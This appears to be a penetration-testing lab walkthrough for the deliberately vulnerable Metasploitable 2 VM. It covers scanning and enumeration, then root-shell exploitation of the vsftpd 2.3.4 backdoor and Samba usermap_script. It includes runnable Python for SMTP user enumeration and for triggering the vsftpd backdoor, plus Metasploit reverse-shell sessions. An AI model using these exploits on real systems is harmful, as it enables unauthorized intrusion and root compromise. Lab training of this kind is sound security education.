Metasploitable 2
Metasploitable 2 is a deliberately vulnerable Linux virtual machine built for security testing, training and education. Below is a complete walkthrough of the machine, from scanning and enumeration through to exploitation of the individual services.
Scanning
┌──(kali㉿kali)-[~]
└─$ sudo nmap -sS -sV -sC -O -p- 192.168.204.136
Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-04-27 04:57 EDT
Nmap scan report for 192.168.204.136
Host is up (0.00067s latency).
Not shown: 65505 closed tcp ports (reset)
PORT STATE SERVICE VERSION
21/tcp open ftp vsftpd 2.3.4
| ftp-syst:
| STAT:
| FTP server status:
| Connected to 192.168.204.137
| Logged in as ftp
| TYPE: ASCII
| No session bandwidth limit
| Session timeout in seconds is 300
| Control connection is plain text
| Data connections will be plain text
| vsFTPd 2.3.4 - secure, fast, stable
|_End of status
|_ftp-anon: Anonymous FTP login allowed (FTP code 230)
22/tcp open ssh OpenSSH 4.7p1 Debian 8ubuntu1 (protocol 2.0)
| ssh-hostkey:
| 1024 60:0f:cf:e1:c0:5f:6a:74:d6:90:24:fa:c4:d5:6c:cd (DSA)
|_ 2048 56:56:24:0f:21:1d:de:a7:2b:ae:61:b1:24:3d:e8:f3 (RSA)
23/tcp open telnet Linux telnetd
25/tcp open smtp Postfix smtpd
|_smtp-commands: metasploitable.localdomain, PIPELINING, SIZE 10240000, VRFY, ETRN, STARTTLS, ENHANCEDSTATUSCODES, 8BITMIME, DSN
| sslv2:
| SSLv2 supported
| ciphers:
| SSL2_RC4_128_EXPORT40_WITH_MD5
| SSL2_RC4_128_WITH_MD5
| SSL2_RC2_128_CBC_EXPORT40_WITH_MD5
| SSL2_DES_192_EDE3_CBC_WITH_MD5
| SSL2_RC2_128_CBC_WITH_MD5
|_ SSL2_DES_64_CBC_WITH_MD5
| ssl-cert: Subject: commonName=ubuntu804-base.localdomain/organizationName=OCOSA/stateOrProvinceName=There is no such thing outside US/countryName=XX
| Not valid before: 2010-03-17T14:07:45
|_Not valid after: 2010-04-16T14:07:45
|_ssl-date: 2024-04-27T09:00:29+00:00; +7s from scanner time.
53/tcp open domain ISC BIND 9.4.2
| dns-nsid:
|_ bind.version: 9.4.2
80/tcp open http Apache httpd 2.2.8 ((Ubuntu) DAV/2)
|_http-server-header: Apache/2.2.8 (Ubuntu) DAV/2
|_http-title: Metasploitable2 - Linux
111/tcp open rpcbind 2 (RPC #100000)
| rpcinfo:
| program version port/proto service
| 100000 2 111/tcp rpcbind
| 100000 2 111/udp rpcbind
| 100003 2,3,4 2049/tcp nfs
| 100003 2,3,4 2049/udp nfs
| 100005 1,2,3 48158/udp mountd
| 100005 1,2,3 53046/tcp mountd
| 100021 1,3,4 39352/udp nlockmgr
| 100021 1,3,4 52660/tcp nlockmgr
| 100024 1 36532/tcp status
|_ 100024 1 37990/udp status
139/tcp open netbios-ssn Samba smbd 3.X - 4.X (workgroup: WORKGROUP)
445/tcp open netbios-ssn Samba smbd 3.0.20-Debian (workgroup: WORKGROUP)
512/tcp open exec netkit-rsh rexecd
513/tcp open login OpenBSD or Solaris rlogind
514/tcp open tcpwrapped
1099/tcp open java-rmi GNU Classpath grmiregistry
1524/tcp open bindshell Metasploitable root shell
2049/tcp open nfs 2-4 (RPC #100003)
2121/tcp open ftp ProFTPD 1.3.1
3306/tcp open mysql MySQL 5.0.51a-3ubuntu5
| mysql-info:
| Protocol: 10
| Version: 5.0.51a-3ubuntu5
| Thread ID: 9
| Capabilities flags: 43564
| Some Capabilities: Speaks41ProtocolNew, SupportsTransactions, SwitchToSSLAfterHandshake, ConnectWithDatabase, LongColumnFlag, Support41Auth, SupportsCompression
| Status: Autocommit
|_ Salt: ddGt6L^rC8/!VoJfBTbp
3632/tcp open distccd distccd v1 ((GNU) 4.2.4 (Ubuntu 4.2.4-1ubuntu4))
5432/tcp open postgresql PostgreSQL DB 8.3.0 - 8.3.7
|_ssl-date: 2024-04-27T09:00:29+00:00; +8s from scanner time.
| ssl-cert: Subject: commonName=ubuntu804-base.localdomain/organizationName=OCOSA/stateOrProvinceName=There is no such thing outside US/countryName=XX
| Not valid before: 2010-03-17T14:07:45
|_Not valid after: 2010-04-16T14:07:45
5900/tcp open vnc VNC (protocol 3.3)
| vnc-info:
| Protocol version: 3.3
| Security types:
|_ VNC Authentication (2)
6000/tcp open X11 (access denied)
6667/tcp open irc UnrealIRCd
| irc-info:
| users: 1
| servers: 1
| lusers: 1
| lservers: 0
| server: irc.Metasploitable.LAN
| version: Unreal3.2.8.1. irc.Metasploitable.LAN
| uptime: 0 days, 2:37:34
| source ident: nmap
| source host: 97C828B9.D560E8F8.FFFA6D49.IP
|_ error: Closing Link: pydyrtxam[192.168.204.137] (Quit: pydyrtxam)
6697/tcp open irc UnrealIRCd (Admin email [email protected])
| irc-info:
| users: 2
| servers: 1
| lusers: 2
| lservers: 0
| server: irc.Metasploitable.LAN
| version: Unreal3.2.8.1. irc.Metasploitable.LAN
| uptime: 0 days, 2:37:34
| source ident: nmap
| source host: 97C828B9.D560E8F8.FFFA6D49.IP
|_ error: Closing Link: aglkdhksl[192.168.204.137] (Quit: aglkdhksl)
8009/tcp open ajp13 Apache Jserv (Protocol v1.3)
|_ajp-methods: Failed to get a valid response for the OPTION request
8180/tcp open http Apache Tomcat/Coyote JSP engine 1.1
|_http-server-header: Apache-Coyote/1.1
|_http-favicon: Apache Tomcat
|_http-title: Apache Tomcat/5.5
8787/tcp open drb Ruby DRb RMI (Ruby 1.8; path /usr/lib/ruby/1.8/drb)
36532/tcp open status 1 (RPC #100024)
43137/tcp open java-rmi GNU Classpath grmiregistry
52660/tcp open nlockmgr 1-4 (RPC #100021)
53046/tcp open mountd 1-3 (RPC #100005)
MAC Address: 00:0C:29:71:62:0D (VMware)
Device type: general purpose
Running: Linux 2.6.X
OS CPE: cpe:/o:linux:linux_kernel:2.6
OS details: Linux 2.6.9 - 2.6.33
Network Distance: 1 hop
Service Info: Hosts: metasploitable.localdomain, irc.Metasploitable.LAN; OSs: Unix, Linux; CPE: cpe:/o:linux:linux_kernel
Host script results:
|_nbstat: NetBIOS name: METASPLOITABLE, NetBIOS user: <unknown>, NetBIOS MAC: <unknown> (unknown)
| smb-os-discovery:
| OS: Unix (Samba 3.0.20-Debian)
| Computer name: metasploitable
| NetBIOS computer name:
| Domain name: localdomain
| FQDN: metasploitable.localdomain
|_ System time: 2024-04-27T05:00:17-04:00
|_clock-skew: mean: 1h00m07s, deviation: 2h00m00s, median: 7s
| smb-security-mode:
| account_used: <blank>
| authentication_level: user
| challenge_response: supported
|_ message_signing: disabled (dangerous, but default)
|_smb2-time: Protocol negotiation failed (SMB2)
OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 151.23 seconds
Enumeration
Netbios Enumeration
We can point nbtscan at an address range and enumerate the whole subnet for NetBIOS names.
└─$ nbtscan -r 192.168.204.135/24
Doing NBT name scan for addresses from 192.168.204.135/24
IP address NetBIOS Name Server User MAC address
------------------------------------------------------------------------------
192.168.204.1 DESKTOP-GF76LUG <server> <unknown> 00:50:56:c0:00:08
192.168.204.135 <unknown> <unknown>
192.168.204.136 METASPLOITABLE <server> METASPLOITABLE 00:00:00:00:00:00
192.168.204.255 Sendto failed: Permission denied
We can see the machine name. Similarly, we can run an nmap scan with the nbstat script.
┌──(kali㉿kali)-[~]
└─$ sudo nmap -sV 192.168.204.136 --script nbstat.nse
Host script results:
| nbstat: NetBIOS name: METASPLOITABLE, NetBIOS user: <unknown>, NetBIOS MAC: 000000000000 (Xerox)
| Names:
| METASPLOITABLE<00> Flags: <unique><active>
| METASPLOITABLE<03> Flags: <unique><active>
| METASPLOITABLE<20> Flags: <unique><active>
| WORKGROUP<00> Flags: <group><active>
|_ WORKGROUP<1e> Flags: <group><active>
Windows also has a built-in tool for this, nbtstat. Its -c option shows the local NetBIOS name cache.
C:\Users\Hp>nbtstat -c
SMB Enumeration
Nmap provides a number of scripts for SMB enumeration.
For example, smb-os-discovery identifies the operating system through SMB.
┌──(kali㉿kali)-[~]
└─$ sudo nmap -p 139,445 -script smb-os-discovery 192.168.204.136
Starting Nmap 7.93 ( https://nmap.org ) at 2024-03-21 09:58 EDT
Nmap scan report for 192.168.204.136
Host is up (0.00031s latency).
PORT STATE SERVICE
139/tcp open netbios-ssn
445/tcp open microsoft-ds
MAC Address: 00:0C:29:71:62:0D (VMware)
Host script results:
| smb-os-discovery:
| OS: Unix (Samba 3.0.20-Debian)
| Computer name: metasploitable
| NetBIOS computer name:
| Domain name: localdomain
| FQDN: metasploitable.localdomain
|_ System time: 2024-03-21T09:58:59-04:00
Nmap done: 1 IP address (1 host up) scanned in 0.63 seconds
Similarly, we can list shares with smbclient. Pressing Enter at the password prompt gives an anonymous (null) session, which this server accepts.
┌──(kali㉿kali)-[~]
└─$ smbclient -L //192.168.204.136
Password for [WORKGROUP\kali]:
Anonymous login successful
Sharename Type Comment
--------- ---- -------
print$ Disk Printer Drivers
tmp Disk oh noes!
opt Disk
IPC$ IPC IPC Service (metasploitable server (Samba 3.0.20-Debian))
ADMIN$ IPC IPC Service (metasploitable server (Samba 3.0.20-Debian))
Reconnecting with SMB1 for workgroup listing.
Anonymous login successful
Server Comment
--------- -------
Workgroup Master
--------- -------
WORKGROUP METASPLOITABLE
Similarly, we can check if we have read/write access on shares with smbmap.
┌──(kali㉿kali)-[~]
└─$ smbmap -H 192.168.204.136
[+] IP: 192.168.204.136:445 Name: 192.168.204.136
Disk Permissions Comment
---- ----------- -------
print$ NO ACCESS Printer Drivers
tmp READ, WRITE oh noes!
opt NO ACCESS
IPC$ NO ACCESS IPC Service (metasploitable server (Samba 3.0.20-Debian))
ADMIN$ NO ACCESS IPC Service (metasploitable server (Samba 3.0.20-Debian)
We have read and write access on the tmp share, which will be useful in the exploitation phase.
The enum4linux script automates this enumeration and can extract usernames as well.
SMTP Enumeration
We can also gather information about a host or network from mail servers. The Simple Mail Transfer Protocol (SMTP) supports several interesting commands, such as VRFY and EXPN. A VRFY request asks the server to verify an email address, while EXPN asks the server for the membership of a mailing list. Both can be abused to confirm which users exist on the mail server, which is useful information during a penetration test.
We can use VRFY to check whether users exist on the SMTP server. A 252 reply confirms the account; a 550 rejects it.
┌──(kali㉿kali)-[~]
└─$ nc -nv 192.168.204.136 25
(UNKNOWN) [192.168.204.136] 25 (smtp) open
220 metasploitable.localdomain ESMTP Postfix (Ubuntu)
VRFY root
252 2.0.0 root
VRFY admin
550 5.1.1 <admin>: Recipient address rejected: User unknown in local recipient table
VRFY msfadmin
252 2.0.0 msfadmin
We can also use the Metasploit auxiliary module scanner/smtp/smtp_enum to enumerate SMTP users.
msf6 auxiliary(scanner/smtp/smtp_enum) > set RHOSTS 192.168.204.136
RHOSTS => 192.168.204.136
msf6 auxiliary(scanner/smtp/smtp_enum) > run
[*] 192.168.204.136:25 - 192.168.204.136:25 Banner: 220 metasploitable.localdomain ESMTP Postfix (Ubuntu)
[+] 192.168.204.136:25 - 192.168.204.136:25 Users found: , backup, bin, daemon, distccd, ftp, games, gnats, irc, libuuid, list, lp, mail, man, mysql, news, nobody, postfix, postgres, postmaster, proxy, service, sshd, sync, sys, syslog, user, uucp, www-data
[*] 192.168.204.136:25 - Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed
smtp-user-enum can check a list of candidate usernames in the same way.
┌──(kali㉿kali)-[~]
└─$ smtp-user-enum -M VRFY -U ~/Downloads/msfusers -t 192.168.204.136
Starting smtp-user-enum v1.2 ( http://pentestmonkey.net/tools/smtp-user-enum )
----------------------------------------------------------
| Scan Information |
----------------------------------------------------------
Mode ..................... VRFY
Worker Processes ......... 5
Usernames file ........... /home/kali/Downloads/msfusers
Target count ............. 1
Username count ........... 15
Target TCP port .......... 25
Query timeout ............ 5 secs
Target domain ............
######## Scan started at Thu Mar 21 10:29:02 2024 #########
192.168.204.136: root exists
192.168.204.136: games exists
192.168.204.136: bin exists
192.168.204.136: nobody exists
192.168.204.136: sshd exists
192.168.204.136: dhcp exists
192.168.204.136: daemon exists
192.168.204.136: gnats exists
192.168.204.136: msfadmin exists
192.168.204.136: tomcat55 exists
######## Scan completed at Thu Mar 21 10:29:04 2024 #########
10 results.
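The three tools above all do the same thing: send VRFY for each candidate and sort the replies by code. As an added example (not code from the walkthrough or from any of those tools), here is that logic in Python together with a constructed stand-in for the Postfix server, so the exchange can be run offline. The user list and hostname are sample data; the stand-in only imitates the 220/252/550/502 replies seen on the page. Two checks the tools do not print are built in: a canary username that cannot exist, to detect servers that answer 2xx to everything, and handling of the 502 reply a Postfix with disable_vrfy_command returns.

```python
import socket
import socketserver
import threading

# Constructed sample data: the local accounts our stand-in server knows about.
KNOWN_USERS = {"root", "msfadmin", "postgres", "www-data"}


class FakePostfixHandler(socketserver.StreamRequestHandler):
    """Answers VRFY the way the Postfix on Metasploitable 2 does:
    252 for a known local recipient, 550 5.1.1 for an unknown one."""

    def handle(self):
        self.wfile.write(b"220 metasploitable.localdomain ESMTP Postfix (Ubuntu)\r\n")
        for raw in self.rfile:
            verb, _, arg = raw.decode("ascii", "replace").strip().partition(" ")
            verb = verb.upper()
            if verb == "VRFY":
                if self.server.vrfy_disabled:
                    reply = "502 5.5.1 VRFY command is disabled"
                elif arg in self.server.users:
                    reply = f"252 2.0.0 {arg}"
                else:
                    reply = (f"550 5.1.1 <{arg}>: Recipient address rejected: "
                             "User unknown in local recipient table")
            elif verb == "QUIT":
                self.wfile.write(b"221 2.0.0 Bye\r\n")
                return
            else:
                reply = "502 5.5.2 Error: command not recognized"
            self.wfile.write((reply + "\r\n").encode("ascii"))


def start_fake_smtp(users, vrfy_disabled=False):
    """Start the stand-in on an ephemeral loopback port; returns (port, server)."""
    srv = socketserver.ThreadingTCPServer(("127.0.0.1", 0), FakePostfixHandler)
    srv.daemon_threads = True
    srv.users, srv.vrfy_disabled = set(users), vrfy_disabled
    threading.Thread(target=srv.serve_forever, daemon=True).start()
    return srv.server_address[1], srv


def read_reply(f):
    """Read one SMTP reply (multi-line '250-...' form included); return its code."""
    while True:
        line = f.readline().decode("ascii", "replace")
        if len(line) < 4:
            raise ConnectionError("server closed the connection")
        if line[3] != "-":          # "250-" continues the reply, "250 " ends it
            return int(line[:3])


def vrfy_enum(host, port, candidates, canary="zzqx_not_a_real_user", timeout=5.0):
    """Probe candidates with VRFY over one connection.

    Returns (results, verdict): results maps username -> reply code; verdict is
    'usable' when the server rejects a canary that cannot exist, 'disabled' when
    VRFY answers 502, and 'inconclusive' when even the canary gets a 2xx (then a
    2xx for a real candidate proves nothing).
    """
    with socket.create_connection((host, port), timeout=timeout) as s:
        f = s.makefile("rb")
        if read_reply(f) != 220:
            raise RuntimeError("unexpected SMTP banner")

        def vrfy(name):
            s.sendall(f"VRFY {name}\r\n".encode("ascii"))
            return read_reply(f)

        canary_code = vrfy(canary)
        if canary_code == 502:
            s.sendall(b"QUIT\r\n")
            return {}, "disabled"
        verdict = "inconclusive" if 200 <= canary_code < 300 else "usable"
        results = {name: vrfy(name) for name in candidates}
        s.sendall(b"QUIT\r\n")
    return results, verdict


def existing_users(results):
    """Usernames whose VRFY reply was 2xx (250, or Postfix's 252)."""
    return sorted(name for name, code in results.items() if 200 <= code < 300)


if __name__ == "__main__":
    port, srv = start_fake_smtp(KNOWN_USERS)
    results, verdict = vrfy_enum("127.0.0.1", port, ["root", "admin", "msfadmin"])
    print(verdict, existing_users(results))   # usable ['msfadmin', 'root']
    srv.shutdown()
```

Against a real target, replace the stand-in with the host and port 25; only treat the 2xx list as confirmed users when the verdict is 'usable'.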
NFS Enumeration
We can list the exported NFS shares with showmount.
┌──(kali㉿kali)-[~]
└─$ showmount -e 192.168.204.136
Export list for 192.168.204.136:
/ *
The export list shows that the root filesystem (/) is exported to any client (*). We can mount it from the attacking machine and make use of it in the exploitation phase.
Port 21 FTP Exploitation Metasploitable2
Scanning
Port 21 is open on Metasploitable 2 and runs vsftpd 2.3.4, a release whose distributed source archive was found to contain a backdoor.
┌──(kali㉿kali)-[~]
└─$ sudo nmap -sV --script vulners -p 21 192.168.204.136
Starting Nmap 7.93 ( https://nmap.org ) at 2024-03-17 07:59 EDT
Nmap scan report for 192.168.204.136
Host is up (0.00039s latency).
PORT STATE SERVICE VERSION
21/tcp open ftp vsftpd 2.3.4
| vulners:
| cpe:/a:vsftpd:vsftpd:2.3.4:
| PRION:CVE-2011-2523 10.0 https://vulners.com/prion/PRION:CVE-2011-2523
| EDB-ID:49757 10.0 https://vulners.com/exploitdb/EDB-ID:49757 *EXPLOIT*
|_ 1337DAY-ID-36095 10.0 https://vulners.com/zdt/1337DAY-ID-36095 *EXPLOIT*
MAC Address: 00:0C:29:71:62:0D (VMware)
Service Info: OS: Unix
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 2.66 seconds
Manual Exploitation vsftpd 2.3.4
┌──(kali㉿kali)-[~]
└─$ ftp 192.168.204.136
Connected to 192.168.204.136.
220 (vsFTPd 2.3.4)
Name (192.168.204.136:kali): a:)
331 Please specify the password.
Password:
421 Service not available, remote server has closed connection.
ftp: Login failed
ftp> exit
The trick is a username containing ":)". When the login is processed, the trojaned server opens a listener on TCP port 6200 that hands out a root shell, and the FTP control connection is dropped (the 421 above). We can now connect to the new port with netcat. The shell has no prompt, so commands are typed blind.
┌──(kali㉿kali)-[~]
└─$ nc -nv 192.168.204.136 6200
(UNKNOWN) [192.168.204.136] 6200 (?) open
id
uid=0(root) gid=0(root)
uname -a
Linux metasploitable 2.6.24-16-server #1 SMP Thu Apr 10 13:58:00 UTC 2008 i686 GNU/Linux
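The exchange above, USER with ":)", PASS, then a connection to 6200, as an added example that is not part of the original walkthrough and not vsftpd's or Exploit-DB's code. To make it runnable offline, the block includes a constructed stand-in for the trojaned server that reproduces only the observable behaviour (banner, 331, and a second port that starts listening after PASS); it answers "id" with a canned line and executes nothing. The username "letmein:)" and the stand-in's ports are assumptions; a real target uses port 21 and 6200.

```python
import socket
import threading
import time

SMILEY = b":)"        # the byte pair (0x3a 0x29) the trojaned vsftpd looks for in the username
BACKDOOR_PORT = 6200  # where the real backdoor listens; the stand-in below picks a free port


class FakeBackdooredFtpd:
    """Constructed stand-in reproducing only the observable behaviour of the
    trojaned vsftpd 2.3.4: normal banner and 331 after USER; once PASS arrives
    for a username containing ':)', a second port starts listening and serves a
    'shell'. The stand-in answers 'id' with a canned line and executes nothing."""

    def __init__(self):
        self.ftp = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
        self.ftp.bind(("127.0.0.1", 0))
        self.ftp.listen(1)
        self.shell = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
        self.shell.bind(("127.0.0.1", 0))   # bound but NOT listening: refuses connections until triggered
        self.ftp_port = self.ftp.getsockname()[1]
        self.shell_port = self.shell.getsockname()[1]
        threading.Thread(target=self._serve_ftp, daemon=True).start()

    def _serve_ftp(self):
        conn, _ = self.ftp.accept()
        with conn:
            f = conn.makefile("rb")
            conn.sendall(b"220 (vsFTPd 2.3.4)\r\n")
            user_line = f.readline()
            conn.sendall(b"331 Please specify the password.\r\n")
            f.readline()                      # PASS <anything>; its value is irrelevant
            if SMILEY in user_line:
                self.shell.listen(1)          # the real code binds 6200 here ...
                self._serve_shell()           # ... and blocks in accept(), never answering PASS
            else:
                conn.sendall(b"530 Login incorrect.\r\n")

    def _serve_shell(self):
        conn, _ = self.shell.accept()
        with conn:
            for line in conn.makefile("rb"):   # no prompt, one reply line per command
                cmd = line.strip()
                if cmd == b"exit":
                    return
                conn.sendall(b"uid=0(root) gid=0(root)\n" if cmd == b"id"
                             else b"sh: " + cmd + b": not found\n")


def wait_for_port(host, port, attempts=30, delay=0.1, timeout=3.0):
    """Connect to host:port, retrying briefly: the listener only appears after the
    server has processed PASS. Returns the socket, or None if it never opened."""
    for _ in range(attempts):
        try:
            return socket.create_connection((host, port), timeout=timeout)
        except OSError:
            time.sleep(delay)
    return None


def run_via_backdoor(host, ftp_port, commands, shell_port=BACKDOOR_PORT,
                     username="letmein:)", timeout=3.0):
    """Trigger the backdoor and run each command over the spawned shell.

    Returns (banner, reply_to_USER, {command: first output line}). Raises
    ConnectionError if the backdoor port never opens, i.e. the server is not the
    trojaned build."""
    if SMILEY not in username.encode():
        raise ValueError("username must contain ':)' to trigger the backdoor")
    with socket.create_connection((host, ftp_port), timeout=timeout) as ctrl:
        cf = ctrl.makefile("rb")
        banner = cf.readline().decode().strip()
        ctrl.sendall(f"USER {username}\r\n".encode())
        user_reply = cf.readline().decode().strip()
        ctrl.sendall(b"PASS anything\r\n")   # no reply is expected to this
        shell = wait_for_port(host, shell_port, timeout=timeout)
        if shell is None:
            raise ConnectionError(f"port {shell_port} never opened: not vulnerable?")
        outputs = {}
        with shell:
            sf = shell.makefile("rb")
            for cmd in commands:
                shell.sendall(cmd.encode() + b"\n")
                outputs[cmd] = sf.readline().decode().rstrip("\n")
            shell.sendall(b"exit\n")
    return banner, user_reply, outputs


if __name__ == "__main__":
    fake = FakeBackdooredFtpd()
    print(run_via_backdoor("127.0.0.1", fake.ftp_port, ["id"], shell_port=fake.shell_port))
```

The retry loop matters on a real target too: the listener on 6200 does not exist until the server has processed PASS, so a connection attempt made too early is refused. If a shell was already spawned by an earlier trigger, a new connection to 6200 may be accepted by the kernel but never answered; the manual and Metasploit methods on this page behave the same way.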
Manual Exploitation vsftpd 2.3.4 Method 2
We can also use an exploit from Exploit-DB. Search for it with searchsploit:
┌──(kali㉿kali)-[~]
└─$ searchsploit vsftpd 2.3.4
--------------------------------------------------------------------------------------------------- ---------------------------------
Exploit Title | Path
--------------------------------------------------------------------------------------------------- ---------------------------------
vsftpd 2.3.4 - Backdoor Command Execution | unix/remote/49757.py
vsftpd 2.3.4 - Backdoor Command Execution (Metasploit) | unix/remote/17491.rb
--------------------------------------------------------------------------------------------------- ---------------------------------
Shellcodes: No Results
Mirror the exploit into the current directory with -m:
┌──(kali㉿kali)-[~]
└─$ searchsploit -m 49757
Exploit: vsftpd 2.3.4 - Backdoor Command Execution
URL: https://www.exploit-db.com/exploits/49757
Path: /usr/share/exploitdb/exploits/unix/remote/49757.py
Codes: CVE-2011-2523
Verified: True
File Type: Python script, ASCII text executable
Copied to: /home/kali/49757.py
Now run it against the target to get a shell:
┌──(kali㉿kali)-[~]
└─$ python2 49757.py 192.168.204.136
Success, shell opened
Send `exit` to quit shell
ls
bin
boot
cdrom
dev
FTP exploitation - Metasploit
Search for vsftpd in Metasploit:
msf6 auxiliary(scanner/vnc/vnc_login) > search vsftpd
Matching Modules
================
# Name Disclosure Date Rank Check Description
- ---- --------------- ---- ----- -----------
0 exploit/unix/ftp/vsftpd_234_backdoor 2011-07-03 excellent No VSFTPD v2.3.4 Backdoor Command Execution
Interact with a module by name or index. For example info 0, use 0 or use exploit/unix/ftp/vsftpd_234_backdoor
Now use the module, set the target and run it. We get a root shell:
msf6 auxiliary(scanner/vnc/vnc_login) > use 0
[*] No payload configured, defaulting to cmd/unix/interact
msf6 exploit(unix/ftp/vsftpd_234_backdoor) > show options
Module options (exploit/unix/ftp/vsftpd_234_backdoor):
Name Current Setting Required Description
---- --------------- -------- -----------
RHOSTS yes The target host(s), see https://github.com/rapid7/metasploit-framework/wi
ki/Using-Metasploit
RPORT 21 yes The target port (TCP)
Payload options (cmd/unix/interact):
Name Current Setting Required Description
---- --------------- -------- -----------
Exploit target:
Id Name
-- ----
0 Automatic
View the full module info with the info, or info -d command.
msf6 exploit(unix/ftp/vsftpd_234_backdoor) > set RHOST 192.168.204.136
RHOST => 192.168.204.136
msf6 exploit(unix/ftp/vsftpd_234_backdoor) > exploit
[*] 192.168.204.136:21 - Banner: 220 (vsFTPd 2.3.4)
[*] 192.168.204.136:21 - USER: 331 Please specify the password.
[+] 192.168.204.136:21 - Backdoor service has been spawned, handling...
[+] 192.168.204.136:21 - UID: uid=0(root) gid=0(root)
[*] Found shell.
[*] Command shell session 1 opened (192.168.204.135:43497 -> 192.168.204.136:6200) at 2024-03-18 10:27:28 -0400
id
uid=0(root) gid=0(root)
Port 445 SMB Exploitation Metasploitable2
Scanning the SMB ports with the vulners and vuln scripts
┌──(kali㉿kali)-[~]
└─$ sudo nmap -sV --script vulners -p 139,445 192.168.204.136
[sudo] password for kali:
Starting Nmap 7.93 ( https://nmap.org ) at 2024-03-17 08:57 EDT
Nmap scan report for 192.168.204.136
Host is up (0.00044s latency).
PORT STATE SERVICE VERSION
139/tcp open netbios-ssn Samba smbd 3.X - 4.X (workgroup: WORKGROUP)
445/tcp open netbios-ssn Samba smbd 3.X - 4.X (workgroup: WORKGROUP)
MAC Address: 00:0C:29:71:62:0D (VMware)
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 12.64 seconds
┌──(kali㉿kali)-[~]
└─$ sudo nmap -sV --script vuln -p 139,445 192.168.204.136
[sudo] password for kali:
Starting Nmap 7.93 ( https://nmap.org ) at 2024-03-17 08:58 EDT
Nmap scan report for 192.168.204.136
Host is up (0.00034s latency).
PORT STATE SERVICE VERSION
139/tcp open netbios-ssn Samba smbd 3.X - 4.X (workgroup: WORKGROUP)
445/tcp open netbios-ssn Samba smbd 3.X - 4.X (workgroup: WORKGROUP)
MAC Address: 00:0C:29:71:62:0D (VMware)
Host script results:
|_smb-vuln-ms10-054: false
|_smb-vuln-ms10-061: false
|_smb-vuln-regsvc-dos: ERROR: Script execution failed (use -d to debug)
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 27.50 seconds
As the nmap scripts did not report an exact Samba version, we can use the Metasploit auxiliary module smb_version.
msf6 > search smb version
Matching Modules
================
# Name Disclosure Date Rank Check Description
- ---- --------------- ---- ----- -----------
0 exploit/multi/http/struts_code_exec_classloader 2014-03-06 manual No Apache Struts ClassLoader Manipulation Remote Code Execution
1 exploit/linux/misc/cisco_rv340_sslvpn 2022-02-02 good Yes Cisco RV340 SSL VPN Unauthenticated Remote Code Execution
2 exploit/windows/smb/ms08_067_netapi 2008-10-28 great Yes MS08-067 Microsoft Server Service Relative Path Stack Corruption
3 exploit/windows/browser/ms10_022_ie_vbscript_winhlp32 2010-02-26 great No MS10-022 Microsoft Internet Explorer Winhlp32.exe MsgBox Code Execution
4 exploit/windows/fileformat/ms14_060_sandworm 2014-10-14 excellent No MS14-060 Microsoft Windows OLE Package Manager Code Execution
5 auxiliary/dos/windows/smb/rras_vls_null_deref 2006-06-14 normal No Microsoft RRAS InterfaceAdjustVLSPointers NULL Dereference
6 auxiliary/dos/windows/smb/ms11_019_electbowser normal No Microsoft Windows Browser Pool DoS
7 exploit/windows/smb/smb_rras_erraticgopher 2017-06-13 average Yes Microsoft Windows RRAS Service MIBEntryGet Overflow
8 auxiliary/dos/windows/smb/ms10_054_queryfs_pool_overflow normal No Microsoft Windows SRV.SYS SrvSmbQueryFsInformation Pool Overflow DoS
9 auxiliary/scanner/smb/smb_version normal No SMB Version Detection
The scanner is number 9 in the list.
msf6 > use 9
msf6 auxiliary(scanner/smb/smb_version) > show options
Module options (auxiliary/scanner/smb/smb_version):
Name Current Setting Required Description
---- --------------- -------- -----------
RHOSTS yes The target host(s), see https://github.com/rapid7/met
asploit-framework/wiki/Using-Metasploit
THREADS 1 yes The number of concurrent threads (max one per host)
View the full module info with the info, or info -d command.
msf6 auxiliary(scanner/smb/smb_version) > set RHOSTS 192.168.204.136
RHOSTS => 192.168.204.136
msf6 auxiliary(scanner/smb/smb_version) > run
[*] 192.168.204.136:445 - SMB Detected (versions:1) (preferred dialect:) (signatures:optional)
[*] 192.168.204.136:445 - Host could not be identified: Unix (Samba 3.0.20-Debian)
[*] 192.168.204.136: - Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed
Running it gives us the Samba version (Samba 3.0.20-Debian).
Now let us see what searchsploit has for that version.
└─$ searchsploit Samba 3.0.20
------------------------------------------------------------------------------- ---------------------------------
Exploit Title | Path
------------------------------------------------------------------------------- ---------------------------------
Samba 3.0.10 < 3.3.5 - Format String / Security Bypass | multiple/remote/10095.txt
Samba 3.0.20 < 3.0.25rc3 - 'Username' map script' Command Execution (Metasploi | unix/remote/16320.rb
Samba < 3.0.20 - Remote Heap Overflow | linux/remote/7701.txt
Samba < 3.6.2 (x86) - Denial of Service (PoC) | linux_x86/dos/36741.py
------------------------------------------------------------------------------- ---------------------------------
Shellcodes: No Results
So there is a Metasploit module for the username map script command execution bug, and 3.0.20 falls inside the affected range.
Samba exploitation Metasploitable 2 with Metasploit
msf6 auxiliary(scanner/smb/smb_version) > search samba user map
Matching Modules
================
# Name Disclosure Date Rank Check Description
- ---- --------------- ---- ----- -----------
0 exploit/multi/samba/usermap_script 2007-05-14 excellent No Samba "username map script" Command Execution
Interact with a module by name or index. For example info 0, use 0 or use exploit/multi/samba/usermap_script
msf6 auxiliary(scanner/smb/smb_version) > use 0
[*] No payload configured, defaulting to cmd/unix/reverse_netcat
msf6 exploit(multi/samba/usermap_script) > show options
Module options (exploit/multi/samba/usermap_script):
Name Current Setting Required Description
---- --------------- -------- -----------
RHOSTS yes The target host(s), see https://github.com/rapid7/meta
sploit-framework/wiki/Using-Metasploit
RPORT 139 yes The target port (TCP)
Payload options (cmd/unix/reverse_netcat):
Name Current Setting Required Description
---- --------------- -------- -----------
LHOST 192.168.204.135 yes The listen address (an interface may be specified)
LPORT 4444 yes The listen port
Exploit target:
Id Name
-- ----
0 Automatic
View the full module info with the info, or info -d command.
msf6 exploit(multi/samba/usermap_script) > set RHOSTS 192.168.204.136
RHOSTS => 192.168.204.136
msf6 exploit(multi/samba/usermap_script) > run
[*] Started reverse TCP handler on 192.168.204.135:4444
ls
